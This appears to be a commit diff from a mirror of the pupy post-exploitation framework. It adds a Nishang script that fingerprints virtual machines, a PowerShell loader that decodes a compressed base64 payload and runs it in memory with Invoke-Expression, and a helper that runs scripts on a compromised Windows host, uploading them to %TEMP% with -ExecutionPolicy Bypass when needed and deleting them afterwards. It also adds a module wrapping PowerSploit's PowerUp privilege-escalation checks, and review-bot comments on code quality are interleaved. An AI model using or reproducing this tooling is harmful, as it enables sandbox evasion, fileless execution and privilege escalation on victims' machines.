mirror of https://github.com/n1nj4sec/pupy.git
adding new feature: powershell upload
parent
d446596063
commit
cb07309a90
|
@ -0,0 +1,303 @@
|
|||
|
||||
|
||||
function Check-VM
|
||||
{
|
||||
|
||||
<#
|
||||
.SYNOPSIS
|
||||
Nishang script which detects whether it is in a known virtual machine.
|
||||
|
||||
.DESCRIPTION
|
||||
This script uses known parameters or 'fingerprints' of Hyper-V, VMWare, Virtual PC, Virtual Box,
|
||||
Xen and QEMU for detecting the environment.
|
||||
|
||||
.EXAMPLE
|
||||
PS > Check-VM
|
||||
|
||||
.LINK
|
||||
http://www.labofapenetrationtester.com/2013/01/quick-post-check-if-your-payload-is.html
|
||||
https://github.com/samratashok/nishang
|
||||
|
||||
.NOTES
|
||||
The script draws heavily from checkvm.rb post module from msf.
|
||||
https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/checkvm.rb
|
||||
#>
|
||||
[CmdletBinding()] Param()
|
||||
$ErrorActionPreference = "SilentlyContinue"
|
||||
#Hyper-V
|
||||
$hyperv = Get-ChildItem HKLM:\SOFTWARE\Microsoft
|
||||
if (($hyperv -match "Hyper-V") -or ($hyperv -match "VirtualMachine"))
|
||||
{
|
||||
$hypervm = $true
|
||||
}
|
||||
|
||||
if (!$hypervm)
|
||||
{
|
||||
$hyperv = Get-ItemProperty hklm:\HARDWARE\DESCRIPTION\System -Name SystemBiosVersion
|
||||
if ($hyperv -match "vrtual")
|
||||
{
|
||||
$hypervm = $true
|
||||
}
|
||||
}
|
||||
|
||||
if (!$hypervm)
|
||||
{
|
||||
$hyperv = Get-ChildItem HKLM:\HARDWARE\ACPI\FADT
|
||||
if ($hyperv -match "vrtual")
|
||||
{
|
||||
$hypervm = $true
|
||||
}
|
||||
}
|
||||
|
||||
if (!$hypervm)
|
||||
{
|
||||
$hyperv = Get-ChildItem HKLM:\HARDWARE\ACPI\RSDT
|
||||
if ($hyperv -match "vrtual")
|
||||
{
|
||||
$hypervm = $true
|
||||
}
|
||||
}
|
||||
|
||||
if (!$hypervm)
|
||||
{
|
||||
$hyperv = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
|
||||
if (($hyperv -match "vmicheartbeat") -or ($hyperv -match "vmicvss") -or ($hyperv -match "vmicshutdown") -or ($hyperv -match "vmiexchange"))
|
||||
{
|
||||
$hypervm = $true
|
||||
}
|
||||
}
|
||||
|
||||
if ($hypervm)
|
||||
{
|
||||
|
||||
"This is a Hyper-V machine."
|
||||
|
||||
}
|
||||
|
||||
#VMWARE
|
||||
|
||||
$vmware = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
|
||||
if (($vmware -match "vmdebug") -or ($vmware -match "vmmouse") -or ($vmware -match "VMTools") -or ($vmware -match "VMMEMCTL"))
|
||||
{
|
||||
$vmwarevm = $true
|
||||
}
|
||||
|
||||
if (!$vmwarevm)
|
||||
{
|
||||
$vmware = Get-ItemProperty hklm:\HARDWARE\DESCRIPTION\System\BIOS -Name SystemManufacturer
|
||||
if ($vmware -match "vmware")
|
||||
{
|
||||
$vmwarevm = $true
|
||||
}
|
||||
}
|
||||
|
||||
if (!$vmwarevm)
|
||||
{
|
||||
$vmware = Get-Childitem hklm:\hardware\devicemap\scsi -recurse | gp -Name identifier
|
||||
if ($vmware -match "vmware")
|
||||
{
|
||||
$vmwarevm = $true
|
||||
}
|
||||
}
|
||||
|
||||
if (!$vmwarevm)
|
||||
{
|
||||
$vmware = Get-Process
|
||||
if (($vmware -eq "vmwareuser.exe") -or ($vmware -match "vmwaretray.exe"))
|
||||
{
|
||||
$vmwarevm = $true
|
||||
}
|
||||
}
|
||||
|
||||
if ($vmwarevm)
|
||||
{
|
||||
|
||||
"This is a VMWare machine."
|
||||
|
||||
}
|
||||
|
||||
#Virtual PC
|
||||
|
||||
$vpc = Get-Process
|
||||
if (($vpc -eq "vmusrvc.exe") -or ($vpc -match "vmsrvc.exe"))
|
||||
{
|
||||
$vpcvm = $true
|
||||
}
|
||||
|
||||
if (!$vpcvm)
|
||||
{
|
||||
$vpc = Get-Process
|
||||
if (($vpc -eq "vmwareuser.exe") -or ($vpc -match "vmwaretray.exe"))
|
||||
{
|
||||
$vpcvm = $true
|
||||
}
|
||||
}
|
||||
|
||||
if (!$vpcvm)
|
||||
{
|
||||
$vpc = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
|
||||
if (($vpc -match "vpc-s3") -or ($vpc -match "vpcuhub") -or ($vpc -match "msvmmouf"))
|
||||
{
|
||||
$vpcvm = $true
|
||||
}
|
||||
}
|
||||
|
||||
if ($vpcvm)
|
||||
{
|
||||
|
||||
"This is a Virtual PC."
|
||||
|
||||
}
|
||||
|
||||
|
||||
#Virtual Box
|
||||
|
||||
$vb = Get-Process
|
||||
if (($vb -eq "vboxservice.exe") -or ($vb -match "vboxtray.exe"))
|
||||
{
|
||||
|
||||
$vbvm = $true
|
||||
|
||||
}
|
||||
if (!$vbvm)
|
||||
{
|
||||
$vb = Get-ChildItem HKLM:\HARDWARE\ACPI\FADT
|
||||
if ($vb -match "vbox_")
|
||||
{
|
||||
$vbvm = $true
|
||||
}
|
||||
}
|
||||
|
||||
if (!$vbvm)
|
||||
{
|
||||
$vb = Get-ChildItem HKLM:\HARDWARE\ACPI\RSDT
|
||||
if ($vb -match "vbox_")
|
||||
{
|
||||
$vbvm = $true
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
if (!$vbvm)
|
||||
{
|
||||
$vb = Get-Childitem hklm:\hardware\devicemap\scsi -recurse | gp -Name identifier
|
||||
if ($vb -match "vbox")
|
||||
{
|
||||
$vbvm = $true
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
|
||||
if (!$vbvm)
|
||||
{
|
||||
$vb = Get-ItemProperty hklm:\HARDWARE\DESCRIPTION\System -Name SystemBiosVersion
|
||||
if ($vb -match "vbox")
|
||||
{
|
||||
$vbvm = $true
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
if (!$vbvm)
|
||||
{
|
||||
$vb = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
|
||||
if (($vb -match "VBoxMouse") -or ($vb -match "VBoxGuest") -or ($vb -match "VBoxService") -or ($vb -match "VBoxSF"))
|
||||
{
|
||||
$vbvm = $true
|
||||
}
|
||||
}
|
||||
|
||||
if ($vbvm)
|
||||
{
|
||||
|
||||
"This is a Virtual Box."
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
#Xen
|
||||
|
||||
$xen = Get-Process
|
||||
|
||||
if ($xen -eq "xenservice.exe")
|
||||
{
|
||||
|
||||
$xenvm = $true
|
||||
|
||||
}
|
||||
|
||||
if (!$xenvm)
|
||||
{
|
||||
$xen = Get-ChildItem HKLM:\HARDWARE\ACPI\FADT
|
||||
if ($xen -match "xen")
|
||||
{
|
||||
$xenvm = $true
|
||||
}
|
||||
}
|
||||
|
||||
if (!$xenvm)
|
||||
{
|
||||
$xen = Get-ChildItem HKLM:\HARDWARE\ACPI\DSDT
|
||||
if ($xen -match "xen")
|
||||
{
|
||||
$xenvm = $true
|
||||
}
|
||||
}
|
||||
|
||||
if (!$xenvm)
|
||||
{
|
||||
$xen = Get-ChildItem HKLM:\HARDWARE\ACPI\RSDT
|
||||
if ($xen -match "xen")
|
||||
{
|
||||
$xenvm = $true
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
if (!$xenvm)
|
||||
{
|
||||
$xen = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
|
||||
if (($xen -match "xenevtchn") -or ($xen -match "xennet") -or ($xen -match "xennet6") -or ($xen -match "xensvc") -or ($xen -match "xenvdb"))
|
||||
{
|
||||
$xenvm = $true
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
if ($xenvm)
|
||||
{
|
||||
|
||||
"This is a Xen Machine."
|
||||
|
||||
}
|
||||
|
||||
|
||||
#QEMU
|
||||
|
||||
$qemu = Get-Childitem hklm:\hardware\devicemap\scsi -recurse | gp -Name identifier
|
||||
if ($qemu -match "qemu")
|
||||
{
|
||||
|
||||
$qemuvm = $true
|
||||
|
||||
}
|
||||
|
||||
if (!$qemuvm)
|
||||
{
|
||||
$qemu = Get-ItemProperty hklm:HARDWARE\DESCRIPTION\System\CentralProcessor\0 -Name ProcessorNameString
|
||||
if ($qemu -match "qemu")
|
||||
{
|
||||
$qemuvm = $true
|
||||
}
|
||||
}
|
||||
|
||||
if ($qemuvm)
|
||||
{
|
||||
|
||||
"This is a Qemu machine."
|
||||
|
||||
}
|
||||
}
|
||||
|
File diff suppressed because one or more lines are too long
|
@ -0,0 +1,20 @@
|
|||
# -*- coding: UTF8 -*-
|
||||
from pupylib.PupyModule import *
|
||||
import os
|
||||
from modules.lib.windows.powershell_upload import execute_powershell_script
|
||||
|
||||
__class_name__="CheckVM"
|
||||
ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),".."))
|
||||
|
||||
@config(compat="windows", category="gather")
|
||||
class CheckVM(PupyModule):
|
||||
""" check if running on Virtual Machine """
|
||||
|
||||
def init_argparse(self):
|
||||
self.arg_parser = PupyArgumentParser(prog="CheckVM", description=self.__doc__)
|
||||
|
||||
def run(self, args):
|
||||
content = open(os.path.join(ROOT, "external", "Nishang", "Check-VM.ps1"), 'r').read()
|
||||
function = 'Check-VM'
|
||||
output = execute_powershell_script(self, content, function)
|
||||
self.success("Output of the script: \n%s" % output)
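Review bot: `run` reads the script with `open(...).read()`, which leaves the file handle open until garbage collection; `with open(path, 'r') as f: content = f.read()` closes it deterministically. The same pattern appears in the PowerUp module's `run` and in the template read at the top of `execute_powershell_script`. `run` also lets any exception from `execute_powershell_script` (a missing script file, a non-zero exit raised by the remote `check_output`) surface as a raw traceback; catching it and reporting through the module's own error channel would be cleaner, assuming `PupyModule` offers one alongside `success`.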
|
|
@ -0,0 +1,10 @@
|
|||
$base64 = "[BASE64]"
|
||||
$data = [System.Convert]::FromBase64String($base64)
|
||||
$ms = New-Object System.IO.MemoryStream
|
||||
$ms.Write($data, 0, $data.Length)
|
||||
$ms.Seek(0,0) | Out-Null
|
||||
$cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress)
|
||||
$sr = New-Object System.IO.StreamReader($cs)
|
||||
$t = $sr.readtoend()
|
||||
Invoke-Expression $t
|
||||
Invoke-Expression [FUNCTION_NAME]
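Review bot: The template carries no comment saying that `[BASE64]` and `[FUNCTION_NAME]` are placeholders filled by plain text replacement in the `powershell_upload` module, and the last line evaluates whatever replaces `[FUNCTION_NAME]` as PowerShell code. A header comment such as `# [BASE64] and [FUNCTION_NAME] are substituted textually by execute_powershell_script; [FUNCTION_NAME] is evaluated as code and must be a fixed function name` would make that contract explicit. Both callers visible in this commit pass hard-coded names, so today this is a documentation gap rather than an injection path, but nothing in the template or the helper enforces it. The reader and stream objects are also never disposed; a `$sr.Dispose()` after `readtoend()` would tidy that up.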
|
|
@ -0,0 +1,54 @@
|
|||
from rpyc.utils.classic import upload
|
||||
import base64
|
||||
import tempfile
|
||||
import gzip
|
||||
import StringIO
|
||||
import subprocess
|
||||
import os
|
||||
|
||||
ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),"..", "..", ".."))
|
||||
|
||||
def execute_powershell_script(module, content, function):
|
||||
template = open(os.path.join(ROOT, "modules", "lib", "utils", "upload_powershell_script_template.ps1"), 'r').read()
|
||||
|
||||
# compress the content of the script to upload
|
||||
out = StringIO.StringIO()
|
||||
with gzip.GzipFile(fileobj=out, mode="w") as f:
|
||||
f.write(content)
|
||||
|
||||
# encode the gzip content in base64
|
||||
encoded = base64.b64encode(out.getvalue())
|
||||
|
||||
# replace meta data from the template
|
||||
template = template.replace('[BASE64]', encoded)
|
||||
template = template.replace('[FUNCTION_NAME]', function)
|
||||
|
||||
output = ""
|
||||
# execute of the powershell script in memory if the size is lower of the max size
|
||||
if len(template) < 32710:
|
||||
module.success("Executing the powershell code on memory")
|
||||
cmd = []
|
||||
cmd.append('powershell.exe')
|
||||
cmd.append('/c')
|
||||
cmd.append(template)
|
||||
output = module.client.conn.modules.subprocess.check_output(cmd, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, universal_newlines=True)
|
||||
else:
|
||||
tf = tempfile.NamedTemporaryFile()
|
||||
f = open(tf.name, 'w')
|
||||
f.write(template)
|
||||
f.close()
|
||||
|
||||
remoteTempFolder = module.client.conn.modules['os.path'].expandvars("%TEMP%")
|
||||
tfName = tf.name.split(os.sep)
|
||||
tfName = tfName[len(tfName)-1]
|
||||
|
||||
module.success("Uploading powershell code to: %s\%s.ps1" % (remoteTempFolder, tfName))
|
||||
upload(module.client.conn, tf.name, module.client.conn.modules['os.path'].join(remoteTempFolder, '%s.ps1' % tfName))
|
||||
|
||||
module.success("Executing the powershell code")
|
||||
output = module.client.conn.modules.subprocess.check_output("PowerShell.exe -ExecutionPolicy Bypass -File %s.ps1"%(module.client.conn.modules['os.path'].join(remoteTempFolder, tfName)), stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell = True)
|
||||
|
||||
module.success("Removing the powershell code")
|
||||
module.client.conn.modules.subprocess.check_output("cmd.exe del %s.ps1" % (module.client.conn.modules['os.path'].join(remoteTempFolder, tfName)), stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell = True)
|
||||
|
||||
return output
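Review bot: `execute_powershell_script` has no docstring, and the `32710` threshold in `if len(template) < 32710:` is an unexplained magic number. A named module constant with a comment, e.g. `MAX_INLINE_SCRIPT_LEN = 32710  # presumably headroom under the Windows command-line length limit; confirm`, would document why the branch exists. The docstring should state the parameters, that the return value is the remote process's combined stdout/stderr, and what each branch leaves on the remote host: a long base64 argument on the `powershell.exe` command line in the inline case, or a `<name>.ps1` file under `%TEMP%` run with `-ExecutionPolicy Bypass` otherwise. In the file branch the remote path is interpolated unquoted into a `shell = True` command string, so a `%TEMP%` value containing spaces or shell metacharacters changes what the shell runs; passing an argument list instead of a formatted string avoids that.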
|
|
@ -0,0 +1,26 @@
|
|||
# -*- coding: UTF8 -*-
|
||||
from pupylib.PupyModule import *
|
||||
import os
|
||||
from modules.lib.windows.powershell_upload import execute_powershell_script
|
||||
|
||||
__class_name__="PowerUp"
|
||||
ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),".."))
|
||||
|
||||
@config(compat="windows", category="admin")
|
||||
class PowerUp(PupyModule):
|
||||
""" trying common Windows privilege escalation methods"""
|
||||
|
||||
def init_argparse(self):
|
||||
self.arg_parser = PupyArgumentParser(prog="PowerUp", description=self.__doc__)
|
||||
|
||||
def run(self, args):
|
||||
content = open(os.path.join(ROOT, "external", "PowerSploit", "Privesc", "PowerUp.ps1"), 'r').read()
|
||||
|
||||
# launch all PowerUp checks
|
||||
function = 'Invoke-AllChecks'
|
||||
|
||||
output = execute_powershell_script(self, content, function)
|
||||
|
||||
# parse output depending on the PowerUp output
|
||||
output = output.replace('\r\n\r\n\r\n', '\r\n\r\n').replace("\n\n", "\n").replace("\n\n", "\n")
|
||||
self.success("Output of the script: \n%s" % output)
|